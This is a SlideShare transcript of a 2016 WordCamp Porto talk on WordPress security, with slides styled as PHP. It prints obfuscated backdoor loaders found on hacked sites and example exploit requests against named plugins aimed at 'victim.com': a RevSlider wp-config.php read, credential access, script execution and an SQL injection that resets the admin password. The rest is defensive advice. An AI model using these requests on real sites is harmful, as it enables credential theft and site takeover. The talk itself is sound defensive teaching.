Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security and Mobility - WordCamp Porto 2016

210 views

Published on

Slides from my talk @ aWordCamp Portugal 2016 about hellodev's experience concerning self-hosted WordPress websites and all the security issues around it. Tips and other useful information inside.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Security and Mobility - WordCamp Porto 2016

  1. 1. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(); /* Início */
  2. 2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;
  3. 3. /* Apresentação */
  4. 4. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */
  5. 5. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
  6. 6. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
 $r=eval(gzinflate(str_rot13(base64_decode($x))));
  7. 7. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS
 $first =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”file permissions”); /* Source: Wordfence March 2016 */
  8. 8. /* O que fazem depois? */ // MOST OF THEM
 $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */
  9. 9. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>
  10. 10. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */
  11. 11. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = file_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”);
 $credentials = file_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */
  12. 12. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”;
 $content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */
  13. 13. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
 $chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */
  14. 14. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);
  15. 15. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin account”);
 $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);
  16. 16. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“0444”; $htaccess =“0444”;
  17. 17. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect files”,“allow certain file extensions from wp_content/*”);
  18. 18. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }
  19. 19. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;
  20. 20. /* Plugins que ajudam */ // SECURITY PLUGINS
 install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);
  21. 21. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();
  22. 22. // MOBILE APP $name =“HELLOSYS”
  23. 23. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
  24. 24. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_you(); /* Fim */

×